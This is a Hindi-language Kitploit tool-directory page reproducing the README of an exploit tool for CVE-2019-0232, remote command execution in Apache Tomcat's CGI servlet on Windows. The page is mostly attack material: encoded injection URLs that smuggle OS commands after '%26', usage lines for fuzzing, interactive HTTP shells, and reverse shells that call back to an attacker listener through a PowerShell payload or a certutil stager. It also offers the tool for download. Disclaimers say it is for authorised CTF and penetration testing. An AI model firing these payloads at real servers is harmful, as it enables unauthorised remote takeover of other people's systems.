Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-0232 — Apache Tomcat CGI Servlet RCE (Windows) | Kitploit
उपकरण/GitHubGitHub/blackjuker2/cve-2019-0232
भेद्यता स्कैनरपेलोड जनरेशनशोषणशेलकोडवेब एप्लिकेशन शोषणफज़िंगपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubblackjuker2/cve-2019-0232

CVE-2019-0232

Apache Tomcat CGI Servlet RCE (Windows)

1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2019-0232 — Apache Tomcat CGI सर्वलेट RCE

केवल अधिकृत CTF / प्रवेश परीक्षण के लिए शैक्षिक PoC।
इसे उन सिस्टमों के खिलाफ चलाना जो आपके स्वामित्व में नहीं हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है।


भेद्यता अवलोकन

CVE-2019-0232 विंडोज पर Apache Tomcat में एक दूरस्थ कोड निष्पादन भेद्यता है।
जब CGI सर्वलेट में enableCmdLineArguments=true (पैच से पहले विंडोज पर डिफ़ॉल्ट) होता है, Tomcat HTTP क्वेरी स्ट्रिंग को सीधे Runtime.exec() के माध्यम से CGI बैच फ़ाइल को कमांड-लाइन तर्क के रूप में भेजता है। विंडोज पर, Runtime.exec() कॉल को cmd.exe /c के साथ लपेटता है, जिससे उन तर्कों के अंदर & कमांड विभाजक सक्रिय हो जाता है।

एक हमलावर URL में & (URL-एन्कोडेड %26) शामिल करके दूसरा OS कमांड इंजेक्ट कर सकता है:

root@kitploit:~
GET /cgi-bin/cmd.bat?%26whoami HTTP/1.1

# Tomcat URL-डिकोड → cmd.exe /c cmd.bat &whoami
# cmd.exe & को देखता है और cmd.bat के बाहर निकलने के बाद whoami चलाता है

प्रभावित संस्करण (केवल विंडोज)

शाखाभेद्य सीमाठीक किया गया
9.0.x9.0.0.M1 – 9.0.179.0.18
8.5.x8.5.0 – 8.5.398.5.40
7.0.x7.0.0 – 7.0.937.0.94

आवश्यकता: conf/web.xml में enableCmdLineArguments=true (पैच से पहले विंडोज पर डिफ़ॉल्ट)।


विशेषताएँ

  • ऑटो मोड — पूर्ण श्रृंखला: गणना करें → CGI पथ फ़ज़ करें → इंटरैक्टिव शेल
  • संस्करण पहचान — HTTP हेडर और त्रुटि पृष्ठों से Tomcat संस्करण की पहचान करता है
  • CGI पथ फ़ज़र — बहु-थ्रेडेड, अंतर्निहित वर्डलिस्ट + वैकल्पिक कस्टम वर्डलिस्ट (-w)
  • एकल कमांड — एक कमांड चलाएँ और आउटपुट प्रिंट करें (--cmd)
  • इंटरैक्टिव HTTP शेल — HTTP पर REPL लूप, प्रत्येक कमांड एक नया अनुरोध
  • रिवर्स शेल — अंतर्निहित TCP लिसनर
    • PowerShell Base64-एन्कोडेड पेलोड (डिफ़ॉल्ट)
    • certutil स्टेजर (फ़ॉलबैक)
  • PATH इंजेक्शन — स्वचालित रूप से System32, Windows, Wbem, PowerShell सेट करता है ताकि whoami, ipconfig, netstat, powershell.exe बिना पूर्ण पथ के काम करें
  • — स्वचालित रूप से जोड़ा जाता है ताकि त्रुटि आउटपुट दिखाई दे

स्थापना

root@kitploit:~
git clone https://github.com/blackjuker2/CVE-2019-0232.git
cd CVE-2019-0232
pip install -r requirements.txt

Python 3.8+ आवश्यक है।


उपयोग

root@kitploit:~
python3 cve_2019_0232.py -t <TARGET_URL> [options]

मोड

उदाहरण

ऑटो मोड — स्क्रिप्ट को सब कुछ खोजने दें:

root@kitploit:~
python3 cve_2019_0232.py -t http://10.10.10.x:8080 --auto

ज्ञात एंडपॉइंट पर एकल कमांड:

root@kitploit:~
python3 cve_2019_0232.py -t http://10.10.10.x:8080 -p /cgi/cmd.bat --cmd whoami

इंटरैक्टिव शेल लूप:

root@kitploit:~
python3 cve_2019_0232.py -t http://10.10.10.x:8080 -p /cgi/cmd.bat --interactive

पूर्ण ऑटो चेन → रिवर्स शेल (अलग nc की आवश्यकता नहीं):

root@kitploit:~
python3 cve_2019_0232.py -t http://10.10.10.x:8080 --auto --reverse-shell --lhost 10.10.14.x --lport 4444

स्क्रिप्ट --lport पर अपना स्वयं का TCP लिसनर खोलती है, PowerShell पेलोड फ़ायर करती है, और जब लक्ष्य कॉलबैक करता है तो आपको इंटरैक्टिव शेल में डाल देती है।

ज्ञात पथ पर PowerShell रिवर्स शेल:

root@kitploit:~
python3 cve_2019_0232.py -t http://10.10.10.x:8080 -p /cgi/cmd.bat  --reverse-shell --lhost 10.10.14.x --lport 4444

certutil स्टेजर (यदि PowerShell अवरुद्ध है):

root@kitploit:~
python3 cve_2019_0232.py -t http://10.10.10.x:8080 -p /cgi/cmd.bat --reverse-shell --lhost 10.10.14.x --lport 4444 --shell-method certutil

फ़ज़िंग के लिए कस्टम वर्डलिस्ट:

root@kitploit:~
python3 cve_2019_0232.py -t http://10.10.10.x:8080 --fuzz -w /usr/share/dirb/wordlists/common.txt

बिना फ़ाइल एक्सटेंशन वाली प्रविष्टियाँ स्वचालित रूप से .bat और .cmd दोनों के रूप में जांची जाती हैं।

Burp Suite के माध्यम से रूट:

root@kitploit:~
python3 cve_2019_0232.py -t http://10.10.10.x:8080 -p /cgi/cmd.bat --cmd whoami --proxy http://127.0.0.1:8080

प्रत्येक अनुरोध से पहले कच्चा इंजेक्शन URL दिखाएं:

root@kitploit:~
python3 cve_2019_0232.py -t http://10.10.10.x:8080 -p /cgi/cmd.bat --interactive --show-url

सभी विकल्प

root@kitploit:~
positional / required:
  -t, --target URL        लक्ष्य आधार URL  e.g. http://10.10.10.x:8080

path:
  -p, --path PATH         ज्ञात CGI स्क्रिप्ट पथ  e.g. /cgi/cmd.bat

modes:
  --auto                  पूर्ण चेन: enum → fuzz → interactive
  --enum                  Tomcat संस्करण और CGI पथों की गणना करें
  --fuzz                  सुलभ CGI स्क्रिप्ट एंडपॉइंट्स के लिए फ़ज़ करें
  --cmd COMMAND           एक कमांड चलाएं और आउटपुट प्रिंट करें
  --interactive           इंटरैक्टिव कमांड लूप (HTTP शेल)
  --reverse-shell         PowerShell रिवर्स शेल भेजें

reverse shell:
  --lhost IP              आपका लिसनर IP (HTB/OSCP के लिए tun0 का उपयोग करें)
  --lport PORT            आपका लिसनर पोर्ट (डिफ़ॉल्ट: 4444)
  --shell-method {ps,certutil}
                          पेलोड प्रकार: ps (डिफ़ॉल्ट) या certutil स्टेजर

options:
  -w, --wordlist FILE     फ़ज़ करने के लिए अतिरिक्त CGI नाम (प्रति पंक्ति एक)
  --threads N             फ़ज़ थ्रेड्स (डिफ़ॉल्ट: 15)
  --timeout N             HTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
  --proxy URL             HTTP प्रॉक्सी  e.g. http://127.0.0.1:8080
  --no-ssl-verify         TLS प्रमाणपत्र सत्यापन अक्षम करें
  --show-url              प्रत्येक अनुरोध से पहले पूर्ण इंजेक्शन URL प्रिंट करें

इंजेक्शन कैसे काम करता है

स्क्रिप्ट तीन चरणों में इंजेक्शन URL बनाती है:

  1. PATH इंजेक्शन — आपके कमांड को एक समूह में लपेटता है जो पहले PATH सेट करता है:

    root@kitploit:~
    (SET PATH=C:\Windows\System32;C:\Windows;...&echo.&<your command> 2>&1)
    

    echo. एक खाली लाइन आउटपुट करता है, Tomcat के CGI हेडर पार्सर को संतुष्ट करता है ताकि प्रतिक्रिया निकाय दिखाई दे।

  2. URL एन्कोडिंग — स्पेस + बन जाते हैं, विशेष वर्ण urllib.parse.quote के माध्यम से %XX बन जाते हैं।

  3. इंजेक्शन बिंदु — एन्कोडेड समूह %26 (& विभाजक) के बाद रखा जाता है:

    root@kitploit:~
    /cgi/cmd.bat?%26(SET+PATH=...%26echo.%26whoami+2>%261)
    

परीक्षण किया गया

  • Windows Server 2019 पर Apache Tomcat 9.0.17
  • Kali Linux पर Python 3.11 / 3.12

संदर्भ

  • NVD — CVE-2019-0232
  • Apache Security Advisory
  • Exploit-DB #47073

कानूनी अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है।
किसी भी सिस्टम का परीक्षण करने से पहले हमेशा स्पष्ट लिखित अनुमति प्राप्त करें।

टूल डाउनलोड करें
stderr विलय
2>&1
  • Burp प्रॉक्सी समर्थन — --proxy http://127.0.0.1:8080 के माध्यम से ट्रैफ़िक रूट करें
  • फ़्लैगविवरण
    --autoगणना → फ़ज़ → इंटरैक्टिव शेल में जाएं
    --enumकेवल Tomcat संस्करण और CGI पथों की गणना करें
    --fuzzसुलभ .bat/.cmd एंडपॉइंट्स के लिए फ़ज़ करें
    --cmd COMMANDएकल कमांड निष्पादित करें
    --interactiveइंटरैक्टिव HTTP शेल लूप
    --reverse-shellरिवर्स शेल उत्पन्न करें (--lhost आवश्यक है)